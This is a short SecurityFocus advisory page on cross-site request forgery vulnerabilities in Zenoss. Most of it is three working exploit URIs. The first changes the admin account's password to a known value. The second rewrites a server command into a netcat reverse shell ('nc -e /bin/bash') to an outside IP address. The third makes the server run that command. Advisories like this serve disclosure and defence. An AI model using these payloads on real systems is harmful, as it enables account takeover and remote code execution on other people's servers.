Zenoss Multiple Cross Site Request Forgery Vulnerabilities

To exploit these issues, an attacker must entice a user into visiting a malicious URI.

The following example URIs are available:

http://www.example.com/zport/dmd/ZenUsers/admin?defaultAdminLevel:int=1&defaultAdminRole=ZenUser&defaultPageSize:int=40&email=&eventConsoleRefresh: boolean=True&manage_editUserSettings:method=Save&netMapStartObject=&pager=& password=letmein&sndpassword=letmein&zenScreenName=editUserSettings

http://www.example.com/zport/dmd/userCommands/ping?command:text=nc -e /bin/bash 172.16.28.6 443&commandId=ping&description:text=& manage_editUserCommand:method=Save&zenScreenName=userCommandDetail

http://www.example.com/zport/dmd/Devices/devices/localhost/manage_doUserCommand?commandId=ping


 

Privacy Statement
Copyright 2010, SecurityFocus